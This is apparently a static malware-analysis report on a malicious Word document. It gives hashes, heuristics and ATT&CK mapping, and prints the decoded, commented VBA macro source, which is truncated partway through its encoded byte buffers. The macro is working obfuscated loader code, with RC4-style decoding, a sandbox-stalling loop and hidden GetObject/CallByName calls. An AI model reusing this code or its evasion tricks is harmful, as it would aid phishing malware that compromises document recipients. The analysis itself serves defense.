Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8078ed991cbc81e4…

MALICIOUS

Office (OLE)

327.5 KB Created: 2018-07-21 05:29:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: ed2b0aa602da76e3fd727bc39ea98990 SHA-1: 8ef44a38cd4c76f7d5874f9c28eb450cff86cd7b SHA-256: 8078ed991cbc81e43fb82acad2b6c417e8a9a40f22f5e320f6d4c38abb5b48f4
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The presence of VBA macros — specifically the GetObject and CallByName calls — strongly suggests malicious intent, and the ClamAV detection 'Doc.Macro.Obfuscation-6663668-0' corroborates it. The VBA code is heavily obfuscated, but its structure indicates it is designed to download and execute a secondary payload; the decoded macro source is available below as the extracted artifact 'macros.bas'.

Heuristics 5

  • ClamAV: Doc.Macro.Obfuscation-6663668-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6663668-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17643 bytes
SHA-256: 73648210224a2a2136f67f48eb2611164ca778c26f42a3c216ed5fbe9747fa54
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' The Attribute lines above are the standard header olevba emits for the ThisDocument
' class module; they are not indicators on their own.
' Module-level state. D12 is an untyped run-once flag checked in f_Layout. The Byte
' arrays are the encoded buffers that the setter subs populate element by element
' (D20 -> D74, D23 -> D77; the others are outside this excerpt) and that D76 passes to
' the decoder D4. Declared sizes match the length argument given to D4 in D76:
' D45=3, D13=10, D7=33, D39=20, D22=14, D44=56, D77=824, D74=6 bytes; D05 (6 bytes)
' is used as the key in the scheduling loop of D76.
Dim D12, D45(2) As Byte, D13(9) As Byte, D7(32) As Byte, D39(19) As Byte, D22(13) As Byte, D05(5) As Byte, D44(55) As Byte, D77(823) As Byte, D74(5) As Byte
' Bitwise XOR spelled out as (a And Not b) Or (Not a And b); the result equals
' `D30 Xor D21`. Writing it this way keeps the literal Xor keyword out of the source,
' presumably to defeat keyword-based scanning (intent inferred from the surrounding
' obfuscation, not proven). D30/D21 are untyped Variants. D0 is not referenced in the
' visible part of the listing; the decoder D4 that would use it is outside the excerpt.
Private Function D0(D30, D21)
D0 = (D30 And Not D21) Or (Not D30 And D21)
End Function
' Trigger routine for the payload chain; what calls it is not in the excerpt.
' The D12 guard makes the body run at most once per session (D12 is set to 95 and
' never reset in the visible code).
Private Sub f_Layout()
If D12 = 0 Then
D12 = 95
Dim D26, D01
D01 = 37183669
' D26 starts as Empty (= 0). Counting up to 37,183,669 has no side effect other than
' consuming time: a stalling loop, consistent with delaying execution past a sandbox's
' analysis window (inferred from the lack of any other effect, not proven here).
While D26 <= D01
D26 = D26 + 1
Wend
' After the loop exits normally D26 = D01 + 1, so this is always true; it only
' confirms the loop ran to completion before handing off to the main routine D76.
If D26 - 1 = D01 Then
D76
End If
End If
End Sub
' Builds a string from a Byte array: each element D17(0 .. D35+1) is mapped through
' D53 (not shown; from usage presumably a byte-to-character conversion such as Chr$)
' and appended. D52 starts as Empty (= 0). The loop bound D35 + 1 can step past the
' array's upper index; On Error Resume Next silently swallows that out-of-range access,
' so the last iteration may append nothing. D46 is not referenced in the visible part
' of D76, which calls D4 instead.
Private Function D46(D17() As Byte, D35)
Dim D52
On Error Resume Next
While D52 <= D35 + 1
D46 = D46 & D53(D17(D52))
D52 = D52 + 1
Wend
End Function
' Thin wrapper around GetObject: resolves the string D92 (a moniker or ProgID) to a
' COM object reference. This is the OLE_VBA_GETOBJ finding from the heuristics. In D76
' the argument is produced at runtime by the decoder D4, so no object or class name
' appears in the static source; recovering it requires decoding the D44/D7 buffers.
Private Function D27(D92)
Set D27 = GetObject(D92)
End Function
' Main routine, reached from f_Layout after the stalling loop. It schedules a key,
' decodes the module-level buffers into strings, and drives a chain of COM objects
' obtained via GetObject (D27) and invoked through D08.
Private Sub D76()
D54 ' not in the excerpt; by position, presumably another buffer-setter like D20/D23 (unverified)
' Only D37 is typed here: in VBA the `As Byte` applies to the last name only, so
' D81, D47 and D89 are Variants.
Dim D81(0 To 255), D47, D89, D37 As Byte
' Key scheduling. D81 is a 256-entry table initialised to the identity (D47 starts
' Empty = 0) and then permuted with the 6-byte key D05 indexed by D47 mod 6. D1 is
' not shown but is used as a modulus here (D1(x, 256) and D1(i, 6)). The loop shape
' (identity init, j = j + S[i] + key[i mod keylen], swap) matches the RC4 key-scheduling
' algorithm. The constants are hidden as arithmetic: -5024+5279 = 255, 6366-6111 = 255,
' 276480/1080 = 256.
While D47 <= (-5024 + 5279)
D81(D47) = D47
D47 = D47 + 1
Wend
D47 = 0
While D47 <= (6366 - 6111)
D89 = D1((D89 + D81(D47) + D05(D1(D47, (6)))), (276480 / 1080))
D37 = D81(D47)
D81(D47) = D81(D89)
D81(D89) = D37
D47 = D47 + 1
Wend
D28 ' setter sub, not shown; fills one of the encoded buffers (unverified)
' D4 (not shown) takes an encoded buffer, the scheduled table D81 and a length equal
' to the buffer size and returns the decoded value — presumably the keystream/XOR
' decoder that pairs with the scheduling above (its body is not in the excerpt).
' The first decoded 56-byte string is handed straight to GetObject via D27.
Dim D82
Set D82 = D27(D4(D44(), D81(), 56))
D06
D33
D23 ' visible below: populates the 824-byte buffer D77 element by element
Dim D58
D58 = D4(D77(), D81(), 824) ' largest decoded blob; passed as an argument in the final D08 call
D20 ' visible below: populates D74
D98
D04
D36
' D08 (not shown) is called with an object, a decoded name, a small integer and
' positional arguments. That shape, together with the CallByName heuristic
' (OLE_VBA_CALLBYNAME), suggests D08 wraps CallByName; the third arguments 1 and 4
' coincide with VbMethod and VbLet of the VbCallType enum (33520/8380 = 4 is another
' hidden constant). This is an inference — D08's body is not in the excerpt.
' The object chain D82 -> D14 -> D48, the second GetObject result D41, and every name
' passed to D08 exist only after runtime decoding, so this listing alone does not
' reveal which COM objects are used; decode the buffers (or observe dynamically) to
' recover them.
Dim D14, D48, D41
Set D14 = D08(D82, D4(D45(), D81(), 3), 1, 0, D4(D39(), D81(), 20), 0)
Set D48 = D08(D14, D4(D22(), D81(), 14), 1, 0, 0, 0)
D08 D48, D4(D13(), D81(), 10), (33520 / 8380), 0, 0, 0
Set D41 = D27(D4(D7(), D81(), 33))
D08 D41, D4(D74(), D81(), 6), 1, 1, D58, D48
End Sub
' Setter sub: populates the 6-byte encoded buffer D74 one element at a time, in
' scrambled index order, so the buffer never appears as a contiguous literal in the
' source. Only indices 0, 1, 3, 4 and 5 are assigned here; index 2 is either set by
' a sub outside the excerpt or stays at its default 0. D76 decodes D74 with length 6
' and uses the result as the name passed to the final D08 call.
Private Sub D20()
D74(4) = 134
D74(1) = 50
D74(5) = 62
D74(3) = 193
D74(0) = 204
End Sub
Private Sub D23()
D77(192) = 13
D77(501) = 35
D77(444) = 212
D77(82) = 131
D77(71) = 140
D77(57) = 145
D77(286) = 249
D77(366) = 55
D77(667) = 237
D77(457) = 186
D77(193) = 200
D77(753) = 80
D77(73) = 185
D77(472) = 100
D77(774) = 104
D77(151) = 21
D77(225) = 96
D77(215) = 13
D77(567) = 140
D77(728) = 45
D77(268) = 127
D77(150) = 87
D77(350) = 237
D77(601) = 42
D77(262) = 204
D77(416) = 195
D77(515) = 229
D77(619) = 217
D77(432) = 46
D77(273) = 110
D77(481) = 73
D77(474) = 57
D77(537) = 167
D77(718) = 128
D77(6) = 225
D77(741) = 154
D77(280) = 194
D77(726) = 147
D77(129) = 53
D77(749) = 60
D77(359) = 14
D77(782) = 124
D77(257) = 61
D77(686) = 187
D77(35) = 62
D77(707) = 246
D77(392) = 234
D77(30) = 61
D77(279) = 249
D77(50) = 207
D77(121) = 150
D77(610) = 67
D77(798) = 18
D77(99) = 155
D77(816) = 254
D77(114) = 183
D77(627) = 254
D77(91) = 221
D77(111) = 149
D77(378) = 145
D77(255) = 49
D77(294) = 81
D77(817) = 140
D77(340) = 118
D77(698) = 56
D77(476) = 187
D77(217) = 117
D77(545) = 68
D77(775) = 138
D77(529) = 80
D77(349) = 48
D77(528) = 22
D77(228) = 210
D77(631) = 23
D77(506) = 124
D77(138) = 183
D77(466) = 247
D77(783) = 123
D77(510) = 217
D77(781) = 214
D77(548) = 239
D77(172) = 241
D77(90) = 90
D77(112) = 138
D77(81) = 136
D77(242) = 52
D77(756) = 241
D77(495) = 45
D77(808) = 2
D77(591) = 128
D77(46) = 227
D77(512) = 160
D77(377) = 131
D77(509) = 27
D77(561) = 163
D77(802) = 154
D77(252) = 7
D77(309) = 67
D77(521) = 95
D77(580) = 248
D77(820) = 121
D77(21) = 174
D77(235) = 148
D77(747) = 92
D77(202) = 42
D77(657) = 196
D77(587) = 34
D77(76) = 68
D77(423) = 122
D77(745) = 96
D77(558) = 88
D77(277) = 186
D77(676) = 24
D77(614) = 127
D77(552) = 224
D77(317) = 186
D77(645) = 254
D77(596) = 225
D77(5) = 13
D77(496) = 104
D77(218) = 95
D77(797) = 131
D77(437) = 21
D77(478) = 10
D77(708) = 198
D77(16) = 6
D77(27) = 242
D77(234) = 80
D77(763) = 100
D77(731) = 138
D77(618) = 37
D77(159) = 217
D77(26) = 152
D77(743) = 32
D77(762) = 5
D77(417) = 122
D77(690) = 33
D77(671) = 23
D77(301) = 240
D77(170) = 129
D77(801) = 11
D77(264) = 5
D77(482) = 104
D77(405) = 217
D77(390) = 171
D77(304) = 128
D77(533) = 240
D77(221) = 21
D77(560) = 63
D77(246) = 60
D77(135) = 3
... (truncated)